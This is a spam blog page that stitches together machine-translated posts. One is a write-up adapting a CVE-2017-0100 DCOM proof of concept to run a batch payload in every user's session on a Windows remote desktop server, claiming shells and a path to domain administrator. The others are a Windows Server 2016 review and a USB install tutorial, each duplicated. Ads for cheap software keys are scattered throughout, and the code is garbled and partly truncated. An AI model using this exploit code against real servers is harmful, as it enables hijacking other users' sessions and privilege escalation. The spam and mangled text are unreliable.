Windows Server 2012 R2 with the process of sharing
0x01 Overview
buy cheap Windows Server 2016 Essentials key
We did not make progress after a Windows Server 2012 R2 was getting low, and then we noticed CVE-2017-0100, which in theory allowed us to perform payloads on each user's active session on the server. Vulnerability and proof of concept vulnerability were filed by James Forshaw; we modified it to suit our situation. The concept proves that a session tag with a DCOM activator is used to allow the user to start any process in a session of another logged-in user.
After analyzing the original proof of the concept, we need to make some changes to suit our situation.
1) Determine what type of payload is feasible with this vulnerability and how the modified payload is identified and executed.
Visual Studio Professional 2017 product key sale
Here is the original code:
Console.WriteLine ("Creating Process in Session {0} after 20secs", new_session_id); Thread.Sleep (20000); IHxHelpPaneServer server = (IHxHelpPaneServer) Marshal.BindToMoniker (String.Format
("Session: {0}! New: 8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id)); Uri target = new Uri (Path.Combine (Environment.GetFolderPath (Environment.SpecialFolder.System)
"Notepad.exe")); server.Execute (target.AbsoluteUri);
After determining that the target parameter is essentially the path of the executable file, the first thing we tried was to try the Regsvr32.exe payload published by Casey Smith's blog. However, we can not get the IHxHelpPaneServer server's execution function to accept the parameters.
We decided to find a path and put a small. Bat file inside, the path is that each user can access the "C: \ TEMP \".
Here is our modified code:
Console.WriteLine ("Creating Process in Session {0} after 20secs", new_session_id); Thread.Sleep
2) Allow the vulnerability to execute code on each session, not just one
The original proof of the proof will collect the session ID for each session on the host, but then execute the code only on one session.
windows 10 enterprise key sale
Here is the original code:
Try {
Int current_session_id = Process.GetCurrentProcess (). SessionId;
Int new_session_id = 0;
Console.WriteLine ("Waiting For a Target Session");
While (true)
{
IEnumerable <int> sessions = GetSessionIds (). Where (id => id! = Current_session_id);
If (sessions.Count ()> 0)
{
New_session_id = sessions.First ();
Break
}
Thread.Sleep (1000);
}}
Our situation requires that we can execute the code in the context of each user, not just the first session. To do this, we simply select a session randomly in the "sessions" object of the existing IEnumerable and use that session to perform our payload. Due to the nature of the random selection, you can execute the code twice on the same user.
get cheap Intuit TurboTax Deluxe 2016 key
Here is our modified code:
Try {
Int current_session_id = Process.GetCurrentProcess (). SessionId;
Int new_session_id = 0;
Console.WriteLine ("Waiting For a Target Session");
While (true)
{
IEnumerable <int> sessions = GetSessionIds (). Where (id => id! = Current_session_id);
If (sessions.Count ()> 0)
{
Random rnd = new Random ();
Int r = rnd.Next (sessions.Count ());
New_session_id = sessions.ElementAt (r);
Break
}
Thread.Sleep (1000);
}}
3) keep the loopholes running until we manually kill the process
The original code will be executed once and then exit. To solve this problem, we only need to let IHxHelpPaneServer in the while loop function.
Here is the original code:
Try {
Int current_session_id = Process.GetCurrentProcess (). SessionId;
Int new_session_id = 0;
Console.WriteLine ("Waiting For a Target Session");
While (true)
{
IEnumerable <int> sessions = GetSessionIds (). Where (id => id! = Current_session_id);
If (sessions.Count ()> 0)
{
New_session_id = sessions.First ();
Break
}
Thread.Sleep (1000);
}
Console.WriteLine ("Creating Process in Session {0} after 20secs", new_session_id);
Thread.Sleep (20000);
IHxHelpPaneServer server = (IHxHelpPaneServer) Marshal.BindToMoniker (String.Format ("session: {0}! New: 8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
Uri target = new Uri (Path.Combine (Environment.GetFolderPath (Environment.SpecialFolder.System), "notepad.exe"))
Server.Execute (target.AbsoluteUri);} catch (Exception ex) {
Console.WriteLine (ex);}
cheap project professional 2013 key sale online
Here is the code we modified:
Try {
Int current_session_id = Process.GetCurrentProcess (). SessionId;
Int new_session_id = 0;
Console.WriteLine ("Waiting For a Target Session");
While (true)
{
IEnumerable <int> sessions = GetSessionIds (). Where (id => id! = Current_session_id);
If (sessions.Count ()> 0)
{
Random rnd = new Random ();
Int r = rnd.Next (sessions.Count ());
New_session_id = sessions.ElementAt (r);
Console.WriteLine ("Creating Process in Session {0} after 20secs", new_session_id);
Thread.Sleep (20000);
IHxHelpPaneServer server = (IHxHelpPaneServer) Marshal.BindToMoniker (String.Format ("session: {0}! New: 8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
Uri target = new Uri ("C: \\ TEMP \\ testing.bat");
Server.Execute (target.AbsoluteUri);
}
Thread.Sleep (60000);
}} Catch (Exception ex) {
Console.WriteLine (ex);}
in conclusion
We understand that we are pleased to be able to modify and succeed with James Forshaw's loopholes in our situation, and finally we have successfully generated shells for each user on the remote desktop server. With these permissions, we can Upgrade to domain administrator.
2017年4月13日星期四
2017年3月31日星期五
How to evaluate Windows Server 2016?
Most of the desktop system function properly, nvidia Optimus dual graphics card can also be used normally, but no all UWP application support, no application store, Contana, Edge browser and the like, but I heard that PowerShell can install some UWP offline package. There is no WSL subsystem, but can be transplanted (I will write a detailed description of the game) slightly but the basic operation of the game, the registry which is best to set up hardware acceleration.
My notebook on the touchpad and a Serial IO drive die does not install) on the desktop as a desktop system is still good, windows server 2016 key sale than the 2012 R2 era full function.
Include Microsoft Imagine project has been open serial number to receive, a student account can get Retail key.
Server use temporarily do not do evaluation, as a senior Linux powder I can not stand on the server with such a broken thing
Added: relative to the desktop system can completely kill Windows Defender this annoying stuff
windows server 2016 product key
Read the next feature, the main function improvements are as follows: 1. Software definition network 2. Better Hyper-V virtualization 3. Native support windows server container, as well as Hyper-V container combined with the DataCenter version of the unlimited number of automatic activation of the virtual machine , Obviously this generation of windows server is directed at the cloud server to go. I am most surprised to install the mirror is only 172MB Nano Server, support the vast majority of ordinary windows server function, remove the GUI and other server-related components of the burden, it is home travel kill,
buy Windows Server 2016 Standard key
In the Rtm out before the equipment, and then changed from the evaluation version of the official version, and later rtm too lazy to change (mainly do not want to reinstall the software, the original is to upgrade the installation, and said the evaluation version and rtm no difference). Used and win 2012r2 feel almost, more than a Bluetooth, but then and eggs. And win10 did not like the automatic installation of the driver, this point difference. Later, driven by the driver installed, the device manager there is an unknown device, do not know what is it. The only comparison pit father's problem is that cheap Visual Studio Professional 2017 key sometimes Huaping, minimize the re-maximization will be good, do not know who's the pot, the other software temporarily no problem.
My notebook on the touchpad and a Serial IO drive die does not install) on the desktop as a desktop system is still good, windows server 2016 key sale than the 2012 R2 era full function.
Include Microsoft Imagine project has been open serial number to receive, a student account can get Retail key.
Server use temporarily do not do evaluation, as a senior Linux powder I can not stand on the server with such a broken thing
Added: relative to the desktop system can completely kill Windows Defender this annoying stuff
windows server 2016 product key
Read the next feature, the main function improvements are as follows: 1. Software definition network 2. Better Hyper-V virtualization 3. Native support windows server container, as well as Hyper-V container combined with the DataCenter version of the unlimited number of automatic activation of the virtual machine , Obviously this generation of windows server is directed at the cloud server to go. I am most surprised to install the mirror is only 172MB Nano Server, support the vast majority of ordinary windows server function, remove the GUI and other server-related components of the burden, it is home travel kill,
buy Windows Server 2016 Standard key
In the Rtm out before the equipment, and then changed from the evaluation version of the official version, and later rtm too lazy to change (mainly do not want to reinstall the software, the original is to upgrade the installation, and said the evaluation version and rtm no difference). Used and win 2012r2 feel almost, more than a Bluetooth, but then and eggs. And win10 did not like the automatic installation of the driver, this point difference. Later, driven by the driver installed, the device manager there is an unknown device, do not know what is it. The only comparison pit father's problem is that cheap Visual Studio Professional 2017 key sometimes Huaping, minimize the re-maximization will be good, do not know who's the pot, the other software temporarily no problem.
2017年3月8日星期三
Install Windows Server 2012
Recently bought a dell server, install Windows Server 2012, or quite trouble.
1, download Windows Server 2012 ISO image file;
2, the production of U disk installation disk;
3, ready to Raid drive, installed when used;
Which the second step in the production of U installation disk, because there are more than 4G files, there is a problem:
Missing installation files.
Here's how to fix this problem.
U disk installation also has two ways,
One is to burn the U disk into disc format, you can burn the U disk as a system installation CD, the process of burning a lot of software can do, but the most commonly used is UltraISO;
get windows 10 key
There is a second U disk installation is the U disk burned into PE, PE is simply a Microsoft released only run in the memory of the underlying system, PE system after the start of the system installation - this method is only applicable On the installation of Windows systems, not for Linux.
There are some system mirrors can not use the U disk to install, because the image install.wim greater than 4G, the following gives you about more than 4G file CD image How to make U disk boot disk.
In the Windows operating system commonly used in the file system (that is, we usually say that the disk format, such as U disk is FAT32 format, etc.) as long as there are FAT32, NTFS and so on. For the FAT32 file system, its shortcomings can not store more than 4G files, and for the NTFS file system, there is no such restrictions.
Generally speaking, when using the first method, U disk will be burned into FAT32 format, and FAT32 file format has the biggest drawback is that it requires the stored file must be less than 4G. And usually we use UltraISO write hard disk image function, regardless of your U disk is what kind of file system, production is complete, U disk will become FAT32 file system, which contains more than 4G files CD image, such as many Windows7,8,8.1 image, for example, this is bad news, so that the U disk will not be able to correctly store more than 4G of the file, so simply can not use.
First, open the ISO file with UltraISO, delete the file larger than 4G (such as install.wim in the sources directory), save the ISO file as a new file, and do not overwrite the original file! After saving, follow the usual method Make bootable U disk:
After the production is completed, the U disk will be converted to NTFS file system, the method is: administrator to run CMD or shortcut keys WIN + R, and then enter the following command convert x: / fs: ntfs (x for the U disk drive letter), back The car can be run.
Decompression ISO image or through the UltraISO find ISO in the sources directory install.wim, extract the corresponding directory to the U disk! Wait for the completion of writing can use U disk to install the new system.
Due to motherboard BIOS, some computers may need to select a different "disk master boot record", if you can not start the case, "convenient start" select "write the new disk master boot record (MBR)" - USB- HDD + (can also choose USB-HDD, USB-ZIP, HDD, etc., can not try other) records can be!
The above is the production of more than 4G files can be bootable U disk operation tutorial. In today's more and more people make Win8, Win10 system disk background, the tutorial for everyone a great help.
More cheapest windows product key sale online
1, download Windows Server 2012 ISO image file;
2, the production of U disk installation disk;
3, ready to Raid drive, installed when used;
Which the second step in the production of U installation disk, because there are more than 4G files, there is a problem:
Missing installation files.
Here's how to fix this problem.
U disk installation also has two ways,
One is to burn the U disk into disc format, you can burn the U disk as a system installation CD, the process of burning a lot of software can do, but the most commonly used is UltraISO;
get windows 10 key
There is a second U disk installation is the U disk burned into PE, PE is simply a Microsoft released only run in the memory of the underlying system, PE system after the start of the system installation - this method is only applicable On the installation of Windows systems, not for Linux.
There are some system mirrors can not use the U disk to install, because the image install.wim greater than 4G, the following gives you about more than 4G file CD image How to make U disk boot disk.
In the Windows operating system commonly used in the file system (that is, we usually say that the disk format, such as U disk is FAT32 format, etc.) as long as there are FAT32, NTFS and so on. For the FAT32 file system, its shortcomings can not store more than 4G files, and for the NTFS file system, there is no such restrictions.
Generally speaking, when using the first method, U disk will be burned into FAT32 format, and FAT32 file format has the biggest drawback is that it requires the stored file must be less than 4G. And usually we use UltraISO write hard disk image function, regardless of your U disk is what kind of file system, production is complete, U disk will become FAT32 file system, which contains more than 4G files CD image, such as many Windows7,8,8.1 image, for example, this is bad news, so that the U disk will not be able to correctly store more than 4G of the file, so simply can not use.
First, open the ISO file with UltraISO, delete the file larger than 4G (such as install.wim in the sources directory), save the ISO file as a new file, and do not overwrite the original file! After saving, follow the usual method Make bootable U disk:
After the production is completed, the U disk will be converted to NTFS file system, the method is: administrator to run CMD or shortcut keys WIN + R, and then enter the following command convert x: / fs: ntfs (x for the U disk drive letter), back The car can be run.
Decompression ISO image or through the UltraISO find ISO in the sources directory install.wim, extract the corresponding directory to the U disk! Wait for the completion of writing can use U disk to install the new system.
Due to motherboard BIOS, some computers may need to select a different "disk master boot record", if you can not start the case, "convenient start" select "write the new disk master boot record (MBR)" - USB- HDD + (can also choose USB-HDD, USB-ZIP, HDD, etc., can not try other) records can be!
The above is the production of more than 4G files can be bootable U disk operation tutorial. In today's more and more people make Win8, Win10 system disk background, the tutorial for everyone a great help.
More cheapest windows product key sale online
订阅:
评论 (Atom)